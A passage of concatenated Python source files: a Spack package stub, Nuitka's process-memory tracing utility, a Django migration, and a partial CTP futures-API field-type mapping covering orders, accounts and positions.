version('1.0.0', '0dc2a917138d0345c00e016ac720e085')
depends_on('libxi')
depends_on('libx11')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
| 40.878049 | 79 | 0.672434 | [
"BSD-3-Clause"
] | ctuning/ck-spack | package/spack-xsetmode/package.py | 1,676 | Python |
# Copyright 2022, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Tools for tracing memory usage at compiled time.
"""
from nuitka.Tracing import printLine
from .Utils import isMacOS, isWin32Windows
def getOwnProcessMemoryUsage():
"""Memory usage of own process in bytes."""
if isWin32Windows():
# adapted from http://code.activestate.com/recipes/578513
import ctypes.wintypes
# Lets allow this to match Windows API it reflects,
# pylint: disable=invalid-name
class PROCESS_MEMORY_COUNTERS_EX(ctypes.Structure):
_fields_ = [
("cb", ctypes.wintypes.DWORD),
("PageFaultCount", ctypes.wintypes.DWORD),
("PeakWorkingSetSize", ctypes.c_size_t),
("WorkingSetSize", ctypes.c_size_t),
("QuotaPeakPagedPoolUsage", ctypes.c_size_t),
("QuotaPagedPoolUsage", ctypes.c_size_t),
("QuotaPeakNonPagedPoolUsage", ctypes.c_size_t),
("QuotaNonPagedPoolUsage", ctypes.c_size_t),
("PagefileUsage", ctypes.c_size_t),
("PeakPagefileUsage", ctypes.c_size_t),
("PrivateUsage", ctypes.c_size_t),
]
GetProcessMemoryInfo = ctypes.windll.psapi.GetProcessMemoryInfo
GetProcessMemoryInfo.argtypes = [
ctypes.wintypes.HANDLE,
ctypes.POINTER(PROCESS_MEMORY_COUNTERS_EX),
ctypes.wintypes.DWORD,
]
GetProcessMemoryInfo.restype = ctypes.wintypes.BOOL
counters = PROCESS_MEMORY_COUNTERS_EX()
rv = GetProcessMemoryInfo(
ctypes.windll.kernel32.GetCurrentProcess(),
ctypes.byref(counters),
ctypes.sizeof(counters),
)
if not rv:
raise ctypes.WinError()
return counters.PrivateUsage
else:
import resource # Posix only code, pylint: disable=I0021,import-error
# The value is from "getrusage", which has OS dependent scaling, at least
# macOS and Linux are different. Others maybe too.
if isMacOS():
factor = 1
else:
factor = 1024
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * factor
def getHumanReadableProcessMemoryUsage(value=None):
if value is None:
value = getOwnProcessMemoryUsage()
if abs(value) < 1024 * 1014:
return "%.2f KB (%d bytes)" % (value / 1024.0, value)
elif abs(value) < 1024 * 1014 * 1024:
return "%.2f MB (%d bytes)" % (value / (1024 * 1024.0), value)
elif abs(value) < 1024 * 1014 * 1024 * 1024:
return "%.2f GB (%d bytes)" % (value / (1024 * 1024 * 1024.0), value)
else:
return "%d bytes" % value
class MemoryWatch(object):
def __init__(self):
self.start = getOwnProcessMemoryUsage()
self.stop = None
def finish(self):
self.stop = getOwnProcessMemoryUsage()
def asStr(self):
return getHumanReadableProcessMemoryUsage(self.stop - self.start)
def startMemoryTracing():
try:
import tracemalloc
except ImportError:
pass
else:
tracemalloc.start()
def showMemoryTrace():
try:
import tracemalloc
except ImportError:
pass
else:
snapshot = tracemalloc.take_snapshot()
stats = snapshot.statistics("lineno")
printLine("Top 50 memory allocations:")
for count, stat in enumerate(stats):
if count == 50:
break
printLine(stat)
| 32.340909 | 81 | 0.625908 | [
"Apache-2.0"
] | sthagen/Nuitka-Nuitka | nuitka/utils/MemoryUsage.py | 4,269 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-04-30 17:09
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_storages', '0025_auto_20180426_1035'),
]
operations = [
migrations.RemoveField(
model_name='lineoutgoingalbaran',
name='prepare_user',
),
migrations.AddField(
model_name='outgoingalbaran',
name='inventory',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='outgoing_albarans', to='codenerix_storages.InventoryOut', verbose_name='Inventory'),
),
migrations.AlterField(
model_name='outgoingalbaran',
name='request_stock',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='outgoing_albarans', to='codenerix_storages.RequestStock', verbose_name='Request stock'),
),
]
| 35.612903 | 206 | 0.672101 | [
"Apache-2.0"
] | centrologic/django-codenerix-storages | codenerix_storages/migrations/0026_auto_20180430_1909.py | 1,104 | Python |
CThostFtdcDisseminationField = {
"SequenceSeries": "int",
"SequenceNo": "int",
}
CThostFtdcReqUserLoginField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"OneTimePassword": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"ClientIPPort": "int",
}
CThostFtdcRspUserLoginField = {
"TradingDay": "string",
"LoginTime": "string",
"BrokerID": "string",
"UserID": "string",
"SystemName": "string",
"FrontID": "int",
"SessionID": "int",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"INETime": "string",
}
CThostFtdcUserLogoutField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcForceUserLogoutField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcReqAuthenticateField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AuthCode": "string",
"AppID": "string",
}
CThostFtdcRspAuthenticateField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AppID": "string",
"AppType": "char",
}
CThostFtdcAuthenticationInfoField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AuthInfo": "string",
"IsResult": "int",
"AppID": "string",
"AppType": "char",
}
CThostFtdcRspUserLogin2Field = {
"TradingDay": "string",
"LoginTime": "string",
"BrokerID": "string",
"UserID": "string",
"SystemName": "string",
"FrontID": "int",
"SessionID": "int",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"INETime": "string",
"RandomString": "string",
}
CThostFtdcTransferHeaderField = {
"Version": "string",
"TradeCode": "string",
"TradeDate": "string",
"TradeTime": "string",
"TradeSerial": "string",
"FutureID": "string",
"BankID": "string",
"BankBrchID": "string",
"OperNo": "string",
"DeviceID": "string",
"RecordNum": "string",
"SessionID": "int",
"RequestID": "int",
}
CThostFtdcTransferBankToFutureReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferBankToFutureRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferFutureToBankReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferFutureToBankRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferQryBankReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"CurrencyCode": "string",
}
CThostFtdcTransferQryBankRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"UseAmt": "double",
"FetchAmt": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferQryDetailReqField = {
"FutureAccount": "string",
}
CThostFtdcTransferQryDetailRspField = {
"TradeDate": "string",
"TradeTime": "string",
"TradeCode": "string",
"FutureSerial": "int",
"FutureID": "string",
"FutureAccount": "string",
"BankSerial": "int",
"BankID": "string",
"BankBrchID": "string",
"BankAccount": "string",
"CertCode": "string",
"CurrencyCode": "string",
"TxAmount": "double",
"Flag": "char",
}
CThostFtdcRspInfoField = {
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcExchangeField = {
"ExchangeID": "string",
"ExchangeName": "string",
"ExchangeProperty": "char",
}
CThostFtdcProductField = {
"ProductID": "string",
"ProductName": "string",
"ExchangeID": "string",
"ProductClass": "char",
"VolumeMultiple": "int",
"PriceTick": "double",
"MaxMarketOrderVolume": "int",
"MinMarketOrderVolume": "int",
"MaxLimitOrderVolume": "int",
"MinLimitOrderVolume": "int",
"PositionType": "char",
"PositionDateType": "char",
"CloseDealType": "char",
"TradeCurrencyID": "string",
"MortgageFundUseRange": "char",
"ExchangeProductID": "string",
"UnderlyingMultiple": "double",
}
CThostFtdcInstrumentField = {
"InstrumentID": "string",
"ExchangeID": "string",
"InstrumentName": "string",
"ExchangeInstID": "string",
"ProductID": "string",
"ProductClass": "char",
"DeliveryYear": "int",
"DeliveryMonth": "int",
"MaxMarketOrderVolume": "int",
"MinMarketOrderVolume": "int",
"MaxLimitOrderVolume": "int",
"MinLimitOrderVolume": "int",
"VolumeMultiple": "int",
"PriceTick": "double",
"CreateDate": "string",
"OpenDate": "string",
"ExpireDate": "string",
"StartDelivDate": "string",
"EndDelivDate": "string",
"InstLifePhase": "char",
"IsTrading": "int",
"PositionType": "char",
"PositionDateType": "char",
"LongMarginRatio": "double",
"ShortMarginRatio": "double",
"MaxMarginSideAlgorithm": "char",
"UnderlyingInstrID": "string",
"StrikePrice": "double",
"OptionsType": "char",
"UnderlyingMultiple": "double",
"CombinationType": "char",
}
CThostFtdcBrokerField = {
"BrokerID": "string",
"BrokerAbbr": "string",
"BrokerName": "string",
"IsActive": "int",
}
CThostFtdcTraderField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallCount": "int",
"BrokerID": "string",
}
CThostFtdcInvestorField = {
"InvestorID": "string",
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorName": "string",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"IsActive": "int",
"Telephone": "string",
"Address": "string",
"OpenDate": "string",
"Mobile": "string",
"CommModelID": "string",
"MarginModelID": "string",
}
CThostFtdcTradingCodeField = {
"InvestorID": "string",
"BrokerID": "string",
"ExchangeID": "string",
"ClientID": "string",
"IsActive": "int",
"ClientIDType": "char",
"BranchID": "string",
"BizType": "char",
"InvestUnitID": "string",
}
CThostFtdcPartBrokerField = {
"BrokerID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"IsActive": "int",
}
CThostFtdcSuperUserField = {
"UserID": "string",
"UserName": "string",
"Password": "string",
"IsActive": "int",
}
CThostFtdcSuperUserFunctionField = {
"UserID": "string",
"FunctionCode": "char",
}
CThostFtdcInvestorGroupField = {
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorGroupName": "string",
}
CThostFtdcTradingAccountField = {
"BrokerID": "string",
"AccountID": "string",
"PreMortgage": "double",
"PreCredit": "double",
"PreDeposit": "double",
"PreBalance": "double",
"PreMargin": "double",
"InterestBase": "double",
"Interest": "double",
"Deposit": "double",
"Withdraw": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CurrMargin": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"Balance": "double",
"Available": "double",
"WithdrawQuota": "double",
"Reserve": "double",
"TradingDay": "string",
"SettlementID": "int",
"Credit": "double",
"Mortgage": "double",
"ExchangeMargin": "double",
"DeliveryMargin": "double",
"ExchangeDeliveryMargin": "double",
"ReserveBalance": "double",
"CurrencyID": "string",
"PreFundMortgageIn": "double",
"PreFundMortgageOut": "double",
"FundMortgageIn": "double",
"FundMortgageOut": "double",
"FundMortgageAvailable": "double",
"MortgageableFund": "double",
"SpecProductMargin": "double",
"SpecProductFrozenMargin": "double",
"SpecProductCommission": "double",
"SpecProductFrozenCommission": "double",
"SpecProductPositionProfit": "double",
"SpecProductCloseProfit": "double",
"SpecProductPositionProfitByAlg": "double",
"SpecProductExchangeMargin": "double",
"BizType": "char",
"FrozenSwap": "double",
"RemainSwap": "double",
}
CThostFtdcInvestorPositionField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"PosiDirection": "char",
"HedgeFlag": "char",
"PositionDate": "char",
"YdPosition": "int",
"Position": "int",
"LongFrozen": "int",
"ShortFrozen": "int",
"LongFrozenAmount": "double",
"ShortFrozenAmount": "double",
"OpenVolume": "int",
"CloseVolume": "int",
"OpenAmount": "double",
"CloseAmount": "double",
"PositionCost": "double",
"PreMargin": "double",
"UseMargin": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"PreSettlementPrice": "double",
"SettlementPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"OpenCost": "double",
"ExchangeMargin": "double",
"CombPosition": "int",
"CombLongFrozen": "int",
"CombShortFrozen": "int",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"TodayPosition": "int",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"StrikeFrozen": "int",
"StrikeFrozenAmount": "double",
"AbandonFrozen": "int",
"ExchangeID": "string",
"YdStrikeFrozen": "int",
"InvestUnitID": "string",
}
CThostFtdcInstrumentMarginRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"ExchangeID": "string",
"BizType": "char",
"InvestUnitID": "string",
}
CThostFtdcDepthMarketDataField = {
"TradingDay": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"LastPrice": "double",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
"ClosePrice": "double",
"SettlementPrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"PreDelta": "double",
"CurrDelta": "double",
"UpdateTime": "string",
"UpdateMillisec": "int",
"BidPrice1": "double",
"BidVolume1": "int",
"AskPrice1": "double",
"AskVolume1": "int",
"BidPrice2": "double",
"BidVolume2": "int",
"AskPrice2": "double",
"AskVolume2": "int",
"BidPrice3": "double",
"BidVolume3": "int",
"AskPrice3": "double",
"AskVolume3": "int",
"BidPrice4": "double",
"BidVolume4": "int",
"AskPrice4": "double",
"AskVolume4": "int",
"BidPrice5": "double",
"BidVolume5": "int",
"AskPrice5": "double",
"AskVolume5": "int",
"AveragePrice": "double",
"ActionDay": "string",
}
CThostFtdcInstrumentTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"TradingRight": "char",
}
CThostFtdcBrokerUserField = {
"BrokerID": "string",
"UserID": "string",
"UserName": "string",
"UserType": "char",
"IsActive": "int",
"IsUsingOTP": "int",
"IsAuthForce": "int",
}
CThostFtdcBrokerUserPasswordField = {
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"LastUpdateTime": "string",
"LastLoginTime": "string",
"ExpireDate": "string",
"WeakExpireDate": "string",
}
CThostFtdcBrokerUserFunctionField = {
"BrokerID": "string",
"UserID": "string",
"BrokerFunctionCode": "char",
}
CThostFtdcTraderOfferField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallID": "int",
"OrderLocalID": "string",
"TraderConnectStatus": "char",
"ConnectRequestDate": "string",
"ConnectRequestTime": "string",
"LastReportDate": "string",
"LastReportTime": "string",
"ConnectDate": "string",
"ConnectTime": "string",
"StartDate": "string",
"StartTime": "string",
"TradingDay": "string",
"BrokerID": "string",
"MaxTradeID": "string",
"MaxOrderMessageReference": "string",
}
CThostFtdcSettlementInfoField = {
"TradingDay": "string",
"SettlementID": "int",
"BrokerID": "string",
"InvestorID": "string",
"SequenceNo": "int",
"Content": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcInstrumentMarginRateAdjustField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
}
CThostFtdcExchangeMarginRateField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"ExchangeID": "string",
}
CThostFtdcExchangeMarginRateAdjustField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"ExchLongMarginRatioByMoney": "double",
"ExchLongMarginRatioByVolume": "double",
"ExchShortMarginRatioByMoney": "double",
"ExchShortMarginRatioByVolume": "double",
"NoLongMarginRatioByMoney": "double",
"NoLongMarginRatioByVolume": "double",
"NoShortMarginRatioByMoney": "double",
"NoShortMarginRatioByVolume": "double",
}
CThostFtdcExchangeRateField = {
"BrokerID": "string",
"FromCurrencyID": "string",
"FromCurrencyUnit": "double",
"ToCurrencyID": "string",
"ExchangeRate": "double",
}
CThostFtdcSettlementRefField = {
"TradingDay": "string",
"SettlementID": "int",
}
CThostFtdcCurrentTimeField = {
"CurrDate": "string",
"CurrTime": "string",
"CurrMillisec": "int",
"ActionDay": "string",
}
CThostFtdcCommPhaseField = {
"TradingDay": "string",
"CommPhaseNo": "int",
"SystemID": "string",
}
CThostFtdcLoginInfoField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
"LoginDate": "string",
"LoginTime": "string",
"IPAddress": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"SystemName": "string",
"PasswordDeprecated": "string",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"MacAddress": "string",
"OneTimePassword": "string",
"INETime": "string",
"IsQryControl": "int",
"LoginRemark": "string",
"Password": "string",
}
CThostFtdcLogoutAllField = {
"FrontID": "int",
"SessionID": "int",
"SystemName": "string",
}
CThostFtdcFrontStatusField = {
"FrontID": "int",
"LastReportDate": "string",
"LastReportTime": "string",
"IsActive": "int",
}
CThostFtdcUserPasswordUpdateField = {
"BrokerID": "string",
"UserID": "string",
"OldPassword": "string",
"NewPassword": "string",
}
CThostFtdcInputOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"IsSwapOrder": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"UserForceClose": "int",
"ActiveUserID": "string",
"BrokerOrderSeq": "int",
"RelativeOrderSysID": "string",
"ZCETotalTradedVolume": "int",
"IsSwapOrder": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderField = {
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderInsertErrorField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcInputOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderActionField = {
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderActionErrorField = {
"ExchangeID": "string",
"OrderSysID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcExchangeTradeField = {
"ExchangeID": "string",
"TradeID": "string",
"Direction": "char",
"OrderSysID": "string",
"ParticipantID": "string",
"ClientID": "string",
"TradingRole": "char",
"ExchangeInstID": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"Price": "double",
"Volume": "int",
"TradeDate": "string",
"TradeTime": "string",
"TradeType": "char",
"PriceSource": "char",
"TraderID": "string",
"OrderLocalID": "string",
"ClearingPartID": "string",
"BusinessUnit": "string",
"SequenceNo": "int",
"TradeSource": "char",
}
CThostFtdcTradeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"ExchangeID": "string",
"TradeID": "string",
"Direction": "char",
"OrderSysID": "string",
"ParticipantID": "string",
"ClientID": "string",
"TradingRole": "char",
"ExchangeInstID": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"Price": "double",
"Volume": "int",
"TradeDate": "string",
"TradeTime": "string",
"TradeType": "char",
"PriceSource": "char",
"TraderID": "string",
"OrderLocalID": "string",
"ClearingPartID": "string",
"BusinessUnit": "string",
"SequenceNo": "int",
"TradingDay": "string",
"SettlementID": "int",
"BrokerOrderSeq": "int",
"TradeSource": "char",
"InvestUnitID": "string",
}
CThostFtdcUserSessionField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
"LoginDate": "string",
"LoginTime": "string",
"IPAddress": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"LoginRemark": "string",
}
CThostFtdcQueryMaxOrderVolumeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
"OffsetFlag": "char",
"HedgeFlag": "char",
"MaxVolume": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcSettlementInfoConfirmField = {
"BrokerID": "string",
"InvestorID": "string",
"ConfirmDate": "string",
"ConfirmTime": "string",
"SettlementID": "int",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcSyncDepositField = {
"DepositSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"Deposit": "double",
"IsForce": "int",
"CurrencyID": "string",
}
CThostFtdcSyncFundMortgageField = {
"MortgageSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"FromCurrencyID": "string",
"MortgageAmount": "double",
"ToCurrencyID": "string",
}
CThostFtdcBrokerSyncField = {
"BrokerID": "string",
}
CThostFtdcSyncingInvestorField = {
"InvestorID": "string",
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorName": "string",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"IsActive": "int",
"Telephone": "string",
"Address": "string",
"OpenDate": "string",
"Mobile": "string",
"CommModelID": "string",
"MarginModelID": "string",
}
CThostFtdcSyncingTradingCodeField = {
"InvestorID": "string",
"BrokerID": "string",
"ExchangeID": "string",
"ClientID": "string",
"IsActive": "int",
"ClientIDType": "char",
}
CThostFtdcSyncingInvestorGroupField = {
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorGroupName": "string",
}
CThostFtdcSyncingTradingAccountField = {
"BrokerID": "string",
"AccountID": "string",
"PreMortgage": "double",
"PreCredit": "double",
"PreDeposit": "double",
"PreBalance": "double",
"PreMargin": "double",
"InterestBase": "double",
"Interest": "double",
"Deposit": "double",
"Withdraw": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CurrMargin": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"Balance": "double",
"Available": "double",
"WithdrawQuota": "double",
"Reserve": "double",
"TradingDay": "string",
"SettlementID": "int",
"Credit": "double",
"Mortgage": "double",
"ExchangeMargin": "double",
"DeliveryMargin": "double",
"ExchangeDeliveryMargin": "double",
"ReserveBalance": "double",
"CurrencyID": "string",
"PreFundMortgageIn": "double",
"PreFundMortgageOut": "double",
"FundMortgageIn": "double",
"FundMortgageOut": "double",
"FundMortgageAvailable": "double",
"MortgageableFund": "double",
"SpecProductMargin": "double",
"SpecProductFrozenMargin": "double",
"SpecProductCommission": "double",
"SpecProductFrozenCommission": "double",
"SpecProductPositionProfit": "double",
"SpecProductCloseProfit": "double",
"SpecProductPositionProfitByAlg": "double",
"SpecProductExchangeMargin": "double",
"FrozenSwap": "double",
"RemainSwap": "double",
}
CThostFtdcSyncingInvestorPositionField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"PosiDirection": "char",
"HedgeFlag": "char",
"PositionDate": "char",
"YdPosition": "int",
"Position": "int",
"LongFrozen": "int",
"ShortFrozen": "int",
"LongFrozenAmount": "double",
"ShortFrozenAmount": "double",
"OpenVolume": "int",
"CloseVolume": "int",
